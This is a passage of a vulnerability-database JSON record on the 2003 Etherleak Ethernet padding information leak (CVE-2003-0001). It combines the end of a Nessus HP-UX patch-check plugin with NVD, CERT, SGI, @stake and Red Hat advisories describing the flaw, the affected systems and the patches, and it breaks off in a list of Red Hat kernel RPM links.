script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28636 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28636\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.00.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.00.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "HP-UX Local Security Checks", "pluginID": "17417", "cpe": ["cpe:/o:hp:hp-ux"]}
{"cve": [{"lastseen": "2018-10-20T11:35:48", "references": ["http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf", "http://www.securitytracker.com/id/1031583", "http://www.securitytracker.com/id/1040185", "http://www.atstake.com/research/advisories/2003/a010603-1.txt", "http://marc.info/?l=bugtraq&m=104222046632243&w=2", "http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html", "http://www.securityfocus.com/archive/1/305335/30/26420/threaded", "http://www.kb.cert.org/vuls/id/412115", "http://www.redhat.com/support/errata/RHSA-2003-088.html", "http://www.redhat.com/support/errata/RHSA-2003-025.html", "http://www.securityfocus.com/archive/1/307564/30/26270/threaded", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"], "description": "Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.", "edition": 5, "reporter": "NVD", "published": "2003-01-17T00:00:00", "title": "CVE-2003-0001", "type": "cve", "enchantments": {"score": {"modified": "2018-10-20T11:35:48", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:2665", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2665"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0001"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:2665", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:2665"}], "modified": "2018-10-19T11:29:14", "cpe": ["cpe:/o:netbsd:netbsd:1.5.1", "cpe:/o:microsoft:windows_2000::sp1:professional", "cpe:/o:freebsd:freebsd:4.4", "cpe:/o:linux:linux_kernel:2.4.9", "cpe:/o:microsoft:windows_2000::sp1:advanced_server", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:microsoft:windows_2000:::datacenter_server", "cpe:/o:linux:linux_kernel:2.4.5", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:netbsd:netbsd:1.5", "cpe:/o:netbsd:netbsd:1.6", "cpe:/o:freebsd:freebsd:4.3", "cpe:/o:microsoft:windows_2000::sp2:advanced_server", "cpe:/o:linux:linux_kernel:2.4.8", "cpe:/o:freebsd:freebsd:4.7", "cpe:/o:linux:linux_kernel:2.4.7", "cpe:/o:microsoft:windows_2000_terminal_services", "cpe:/o:microsoft:windows_2000::sp1:server", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:microsoft:windows_2000_terminal_services::sp2", "cpe:/o:freebsd:freebsd:4.6", "cpe:/o:microsoft:windows_2000_terminal_services::sp1", "cpe:/o:microsoft:windows_2000::sp2:server", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:netbsd:netbsd:1.5.3", "cpe:/o:linux:linux_kernel:2.4.4", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:microsoft:windows_2000::sp2:datacenter_server", "cpe:/o:microsoft:windows_2000:::advanced_server", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:microsoft:windows_2000:::professional", "cpe:/o:microsoft:windows_2000::sp1:datacenter_server", "cpe:/o:microsoft:windows_2000::sp2:professional", "cpe:/o:freebsd:freebsd:4.5", "cpe:/o:linux:linux_kernel:2.4.6", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:netbsd:netbsd:1.5.2", "cpe:/o:microsoft:windows_2000:::server", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:freebsd:freebsd:4.2"], "id": "CVE-2003-0001", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0001", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2018-08-31T02:38:30", "references": ["http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf", "http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf", "http://www.atstake.com/research/advisories/2003/a010603-1.txt", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2003-0001", "http://www.nextgenss.com/advisories/etherleak-2003.txt", "http://www.ietf.org/rfc/rfc1042.txt", "http://www.ietf.org/rfc/rfc1042.txt"], "description": "### Overview\n\nMany network device drivers reuse old frame buffer data to pad packets, resulting in an information leakage vulnerability that may allow remote attackers to harvest sensitive information from affected devices.\n\n### Description\n\nThe Ethernet standard (IEEE 802.3) specifies a minimum data field size of 46 bytes. If a higher layer protocol such as IP provides packet data that is smaller than 46 bytes, the device driver must fill the remainder of the data field with a \"pad\". For IP datagrams, [_RFC1042_](<http://www.ietf.org/rfc/rfc1042.txt>) specifies that \"the data field should be padded (with octets of zero) to meet the IEEE 802 minimum frame size requirements.\" \n\nResearchers from @Stake have discovered that, contrary to the recommendations of RFC1042, many Ethernet device drivers fail to pad frames with null bytes. Instead, these device drivers reuse previously transmitted frame data to pad frames smaller than 46 bytes. This constitutes an information leakage vulnerability that may allow remote attackers to harvest potentially sensitive information. Depending upon the implementation of an affected device driver, the leaked information may originate from dynamic kernel memory, from static system memory allocated to the device driver, or from a hardware buffer located on the network interface card. \n \nFor detailed information on this research, please read @Stake's \"EtherLeak: Ethernet frame padding information leakage\", available at \n \n[_http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf_](<http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf>) \n \nThis vulnerability may also affect link layer networking protocols other than Ethernet. \n \n--- \n \n### Impact\n\nThis vulnerability allows remote attackers to harvest potentially sensitive information from network traffic. In some network environments, this vulnerability can also be used to circumvent technologies that divide networks into separate domains, such as VLANs and routers. \n \n--- \n \n### Solution\n\n**Apply a patch from your vendor** \n \nFor vendor-specific information regarding vulnerability status and patch availability, please consult the Systems Affected section of this document \n \n--- \n \n**Use encryption to protect sensitive data**\n\n \nBy using encryption to protect network traffic, vulnerable sites can greatly reduce the impact of this vulnerability. Affected device drivers will still leak information, but fragments of encrypted information will be useless to attackers. Note that this workaround will not protect sensitive information leaked from non-network sources such as kernel memory. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nDebian Linux| | 25 Jun 2002| 25 Jul 2003 \nGuardian Digital Inc. | | 25 Jun 2002| 24 Mar 2003 \nHewlett-Packard Company| | 25 Jun 2002| 25 Jul 2003 \nIntel| | 25 Jun 2002| 21 Apr 2003 \nMandriva, Inc.| | 25 Jun 2002| 25 Jul 2003 \nNetwork Appliance| | 25 Jun 2002| 08 Jan 2003 \nRed Hat, Inc.| | 25 Jun 2002| 31 Mar 2003 \nSun Microsystems, Inc.| | 25 Jun 2002| 03 Feb 2003 \nXerox Corporation| | 25 Jun 2002| 09 Jun 2003 \nApple Computer, Inc.| | 25 Jun 2002| 10 Jan 2003 \nCheck Point| | 13 Jan 2003| 03 Sep 2013 \nClavister| | 10 Jan 2003| 16 Jan 2003 \nF5 Networks, Inc.| | 25 Jun 2002| 03 Jan 2003 \nHitachi| | 03 Jan 2003| 06 Jan 2003 \nIBM Corporation| | 25 Jun 2002| 10 Jan 2003 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23412115 Vendor Status Inquiry>). \n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf>\n * <http://www.atstake.com/research/advisories/2003/a010603-1.txt>\n * <http://www.nextgenss.com/advisories/etherleak-2003.txt>\n * <http://www.ietf.org/rfc/rfc1042.txt>\n\n### Credit\n\nThe CERT/CC thanks Ofir Arkin and Josh Anderson for their discovery and analysis of this vulnerability.\n\nThis document was written by Jeffrey P. Lanza.\n\n### Other Information\n\n * CVE IDs: [CAN-2003-0001](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2003-0001>)\n * Date Public: 06 Jan 2003\n * Date First Published: 06 Jan 2003\n * Date Last Updated: 03 Sep 2013\n * Severity Metric: 13.50\n * Document Revision: 34\n\n", "edition": 4, "reporter": "CERT", "published": "2003-01-06T00:00:00", "title": "Network device drivers reuse old frame buffer data to pad packets", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2003-0001", "CVE-2003-0001"], "modified": "2013-09-03T00:00:00", "id": "VU:412115", "href": "https://www.kb.cert.org/vuls/id/412115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:17", "references": ["https://vulners.com/securityvulns/securityvulns:doc:4047", "https://vulners.com/securityvulns/securityvulns:doc:3969", "https://vulners.com/securityvulns/securityvulns:doc:6004", "https://vulners.com/securityvulns/securityvulns:doc:3955", "https://vulners.com/securityvulns/securityvulns:doc:9926", "https://vulners.com/securityvulns/securityvulns:doc:4676"], "description": "Incorrect memory managment causes ethernet fame padding bytes may contain sensitive information.", "edition": 1, "reporter": "VULNWATCH", "published": "2005-10-13T00:00:00", "title": "Ethernet frame padding information leakage", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:17", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "kernel", "version": "2.6", "operator": "eq"}, {"name": "kernel", "version": "2.4", "operator": "eq"}], "cvelist": ["CVE-2003-0001"], "modified": "2005-10-13T00:00:00", "id": "SECURITYVULNS:VULN:2523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2523", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:09", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n______________________________________________________________________________\r\n SGI Security Advisory\r\n\r\n Title : Some Network Drivers May Leak Data\r\n Number : 20030601-01-I\r\n Date : April 2, 2004\r\n Reference: CERT Vulnerability Note VU#412115\r\n Reference: CVE CAN-2003-0001\r\n Reference: SGI BUG 878043\r\n______________________________________________________________________________\r\n\r\nSGI provides this information freely to the SGI user community for its\r\nconsideration, interpretation, implementation and use. SGI recommends that\r\nthis information be acted upon as soon as possible.\r\n\r\nSGI provides the information in this Security Advisory on an "AS-IS" basis\r\nonly, and disclaims all warranties with respect thereto, express, implied\r\nor otherwise, including, without limitation, any warranty of merchantability\r\nor fitness for a particular purpose. In no event shall SGI be liable for\r\nany loss of profits, loss of business, loss of data or for any indirect,\r\nspecial, exemplary, incidental or consequential damages of any kind arising\r\nfrom your use of, failure to use or improper use of any of the instructions\r\nor information in this Security Advisory.\r\n______________________________________________________________________________\r\n\r\n- --------------\r\n- --- Update ---\r\n- --------------\r\n\r\nThis is an update to SGI Security Advisory 20030601-01-A:\r\nftp://patches.sgi.com/support/free/security/advisories/20030601-01-A\r\n\r\nAtStake and CERT reported a network device driver vulnerability\r\ncalled EtherLeak:\r\n\r\n http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf\r\n http://www.kb.cert.org/vuls/id/412115\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0001\r\n\r\nThe gXX and tgXX gigabit network interfaces, and efXX network interface on\r\nSGI systems are not vulnerable to this issue.\r\n\r\nHowever, older SGI network interfaces are potentially vulnerable, but\r\nthey are in legacy support mode with no new fixes/patches provided.\r\n\r\nTo find out which network interfaces you have installed, run:\r\n % hinv -c network\r\n Fast Ethernet: ef1, version 1, module 2, slot io1, pci 2\r\n Integral Fast Ethernet: ef0, version 1, module 1, slot io1, pci 2\r\n\r\nIn the above example, both interfaces are efXX NICs and are not\r\nvulnerable to the EtherLeak security issue.\r\n\r\n- -----------------------------------------\r\n- --- SGI Security Information/Contacts ---\r\n- -----------------------------------------\r\n\r\nIf there are questions about this document, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\n ------oOo------\r\n\r\nSGI provides security information and patches for use by the entire SGI\r\ncommunity. This information is freely available to any person needing the\r\ninformation and is available via anonymous FTP and the Web.\r\n\r\nThe primary SGI anonymous FTP site for security advisories and patches is\r\npatches.sgi.com. Security advisories and patches are located under the URL\r\nftp://patches.sgi.com/support/free/security/\r\n\r\nThe SGI Security Headquarters Web page is accessible at the URL\r\nhttp://www.sgi.com/support/security/\r\n\r\nFor issues with the patches on the FTP sites, email can be sent to\r\nsecurity-info@sgi.com.\r\n\r\nFor assistance obtaining or working with security patches, please contact\r\nyour SGI support provider.\r\n\r\n ------oOo------\r\n\r\nSGI provides a free security mailing list service called wiretap and\r\nencourages interested parties to self-subscribe to receive (via email) all\r\nSGI Security Advisories when they are released. Subscribing to the mailing\r\nlist can be done via the Web\r\n(http://www.sgi.com/support/security/wiretap.html) or by sending email to\r\nSGI as outlined below.\r\n\r\n% mail wiretap-request@sgi.com\r\nsubscribe wiretap <YourEmailAddress such as aaanalyst@sgi.com >\r\nend\r\n^d\r\n\r\nIn the example above, <YourEmailAddress> is the email address that you wish\r\nthe mailing list information sent to. The word end must be on a separate\r\nline to indicate the end of the body of the message. The control-d (^d) is\r\nused to indicate to the mail program that you are finished composing the\r\nmail message.\r\n\r\n\r\n ------oOo------\r\n\r\nSGI provides a comprehensive customer World Wide Web site. This site is\r\nlocated at http://www.sgi.com/support/security/ .\r\n\r\n ------oOo------\r\n\r\nFor reporting *NEW* SGI security issues, email can be sent to\r\nsecurity-alert@sgi.com or contact your SGI support provider. A support\r\ncontract is not required for submitting a security report.\r\n______________________________________________________________________________\r\n This information is provided freely to all interested parties\r\n and may be redistributed provided that it is not altered in any\r\n way, SGI is appropriately credited and the document retains and\r\n includes its valid PGP signature.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n\r\niQCVAwUBQG3nJ7Q4cFApAP75AQEdAAP/Xy6DTg8QP0j+KKaEyI50JlAcKln4NQ8a\r\n/RSHcG3LBm1wTKVyfexj1t94MQbEI3K27KOhnMisBka3vmue709ZhB+29w+/K+iy\r\nB9OBjTMrtX3S6xJvQm/nc8iHM2V6kUp4jo1+J1BP1MNjQaVl2B0pSfdBdsRM9Puy\r\na/F96+7fgYg=\r\n=4VLh\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "reporter": "Securityvulns", "published": "2004-04-03T00:00:00", "title": "[Full-Disclosure] IRIX Update Some Network Drivers May Leak Data", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:09", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0001"], "modified": "2004-04-03T00:00:00", "id": "SECURITYVULNS:DOC:6004", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6004", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:06", "references": [], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n @stake, Inc.\r\n www.atstake.com\r\n\r\n Security Advisory\r\n\r\nAdvisory Name: Etherleak: Ethernet frame padding information leakage\r\n Release Date: 01/06/2003\r\n Application: Ethernet device driver software\r\n Platform: Multiple\r\n Severity: Information disclosure\r\n Authors: Ofir Arkin <ofir@sys-security.com>\r\n Josh Anderson\r\nVendor Status: Multiple vendors alerted via CERT Coordination Center\r\nCVE Candidate: CAN-2003-0001\r\n Reference: www.atstake.com/research/advisories/2003/a010603-1.txt\r\n\r\n\r\nOverview:\r\n\r\nMultiple platform ethernet Network Interface Card (NIC) device\r\ndrivers incorrectly handle frame padding, allowing an attacker to\r\nview slices of previously transmitted packets or portions of kernel\r\nmemory. This vulnerability is the result of incorrect implementations\r\nof RFC requirements and poor programming practices, the combination\r\nof which results in several variations of this information leakage\r\nvulnerability.\r\n\r\nThe simplest attack using this vulnerability would be to send ICMP\r\necho messages to a machine with a vulnerable ethernet driver.\r\nPortions of kernel memory will be returned to the attacker in the\r\npadding of the reply messages. During testing we have found that\r\nthe portions returned are typically snippets of network traffic\r\nthat the vulnerable machine is handling. This attack can allow\r\nan attacker to see portions of the traffic that a router or firewall\r\nis handling on network segments the attacker has no direct access\r\ntoo. It is important to note that the attacker must be on the\r\nsame ethernet network as the vulnerable machine to receive the\r\nethernet frames.\r\n\r\n \r\nDetails:\r\n\r\n@stake has prepared a detailed report on this issue. The\r\nvulnerability is explored in its various manifestations through\r\ncode examples and packet captures.\r\n\r\nReport available at:\r\n\r\nwww.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf\r\n\r\n\r\nVendor Response:\r\n\r\nMultiple platform and hardware vendors were contacted via the CERT\r\nCoordination Center on 06/25/02. Detailed vendor response\r\ninformation is available in CERT vulnerability note VU#412115.\r\n\r\n\r\nRecommendation:\r\n\r\nContact the vendor of your ethernet device drivers or your hardware\r\nvendor for a patch.\r\n\r\nEnd to end encryption technologies such as SSL, IPSEC, and SSH\r\nshould be used when transmitting sensitive data over a network. Using\r\nencryption will help protect against this issue partly. It is not a\r\ncomplete solution because the kernel data leaked in the ethernet\r\nframe padding is not always the IP packet data portion of a\r\nprevious frame. Sometimes it is unencrypted IP header information or\r\nother kernel memory.\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe following names to these issues. These are candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n CAN-2003-0001 Ethernet frame padding information leakage\r\n\r\n\r\n@stake Vulnerability Reporting Policy:\r\nhttp://www.atstake.com/research/policy/\r\n\r\n@stake Advisory Archive: http://www.atstake.com/research/advisories/\r\n\r\nPGP Key:\r\nhttp://www.atstake.com/research/pgp_key.asc\r\n\r\nCopyright 2003 @stake, Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.0\r\n\r\niQA/AwUBPhmc+Ee9kNIfAm4yEQKyjACgnvi0ZuRUb94nfcG0zMHPzl6XdZQAn1tG\r\nTXcUNSc0uLgCvhUp0vQAu7+J\r\n=3Dtx\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2003-01-08T00:00:00", "title": "Etherleak: Ethernet frame padding information leakage (A010603-1)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:06", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2003-0001"], "modified": "2003-01-08T00:00:00", "id": "SECURITYVULNS:DOC:3955", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3955", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:07", "references": [], "description": "---------------------------------------------------------------------\r\n Red Hat, Inc. Red Hat Security Advisory\r\n\r\nSynopsis: Updated 2.4 kernel fixes various vulnerabilities\r\nAdvisory ID: RHSA-2003:025-20\r\nIssue date: 2003-01-24\r\nUpdated on: 2003-02-03\r\nProduct: Red Hat Linux\r\nKeywords: ethernet frame padding O_DIRECT\r\nCross references: \r\nObsoletes: RHBA-2002:292\r\nCVE Names: CAN-2003-0001 CAN-2003-0018\r\n---------------------------------------------------------------------\r\n\r\n1. Topic:\r\n\r\nUpdated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 are now\r\navailable that fix an information leak from several ethernet drivers, and\r\na file system issue.\r\n\r\n2. Relevant releases/architectures:\r\n\r\nRed Hat Linux 7.1 - athlon, i386, i586, i686\r\nRed Hat Linux 7.2 - athlon, i386, i586, i686\r\nRed Hat Linux 7.3 - athlon, i386, i586, i686\r\nRed Hat Linux 8.0 - athlon, i386, i586, i686\r\n\r\n3. Problem description:\r\n\r\nThe Linux kernel handles the basic functions of the operating system. \r\nVulnerabilities have been found in version 2.4.18 of the kernel. This\r\nadvisory deals with updates to Red Hat Linux 7.1, 7.2, 7.3, and 8.0. \r\n\r\nMultiple ethernet Network Interface Card (NIC) device drivers do not pad\r\nframes with null bytes, which allows remote attackers to obtain information\r\nfrom previous packets or kernel memory by using malformed packets. The\r\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\r\nthe name CAN-2003-0001 to this issue.\r\n\r\nA vulnerability exists in O_DIRECT handling in Linux kernels 2.4.10 and\r\nlater that can create a limited information leak where any user on the\r\nsystem with write privileges to a file system can read information from\r\nthat file system (from previously deleted files), and can create minor file\r\nsystem corruption (easily repaired by fsck). Red Hat Linux in its default\r\nconfiguration is not affected by this bug, because the ext3 file system\r\n(the default file system in Red Hat Linux 7.2 and later) does not support\r\nthe O_DIRECT feature. Of the kernels Red Hat has released, only the 2.4.18\r\nkernels have this bug. The Common Vulnerabilities and Exposures project\r\n(cve.mitre.org) has assigned the name CAN-2003-0018 to this issue.\r\n\r\nUsers of the ext2 file system can migrate to the ext3 file system\r\nusing the tune2fs program as described in the white paper at\r\nhttp://www.redhat.com/support/wpapers/redhat/ext3/\r\n\r\nAll users of Red Hat Linux 7.1, 7.2, 7.3, and 8.0 should upgrade\r\nto these errata packages, which contain patches to ethernet drivers to\r\nremove the information leak and a patch to fix O_DIRECT handling.\r\n\r\nIn addition, the following drivers are upgraded to support newer hardware:\r\n3c59x, e100, e1000, tg3\r\n\r\n4. Solution:\r\n\r\nBefore applying this update, make sure all previously released errata\r\nrelevant to your system have been applied, especially the additional\r\npackages from RHSA-2002:205 and RHSA-2002:206 respectively.\r\n\r\nThe procedure for upgrading the kernel manually is documented at:\r\n\r\nhttp://www.redhat.com/support/docs/howto/kernel-upgrade/\r\n\r\nPlease read the directions for your architecture carefully before\r\nproceeding with the kernel upgrade.\r\n\r\nPlease note that this update is also available via Red Hat Network. Many\r\npeople find this to be an easier way to apply updates. To use Red Hat\r\nNetwork, launch the Red Hat Update Agent with the following command:\r\n\r\nup2date\r\n\r\nThis will start an interactive process that will result in the appropriate\r\nRPMs being upgraded on your system. Note that you need to select the kernel\r\nexplicitly on default configurations of up2date.\r\n\r\n5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):\r\n\r\n76159 - Errata kernel 2.4.18-17.8.0 fails PCI resource allocation\r\n\r\n6. RPMs required:\r\n\r\nRed Hat Linux 7.1:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n\r\nathlon:\r\nftp://updates.redhat.com/7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nftp://updates.redhat.com/7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n\r\ni586:\r\nftp://updates.redhat.com/7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\nftp://updates.redhat.com/7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\n\r\ni686:\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\n\r\nRed Hat Linux 7.2:\r\n\r\nSRPMS:\r\nftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm\r\n\r\nathlon:\r\nftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm\r\nftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm\r\n\r\ni386:\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm\r\nftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm\r\n\r\ni586:\r\nftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm\r\nftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm\r\n\r\ni686:\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm\r\nftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm\r\n\r\nRed Hat Linux 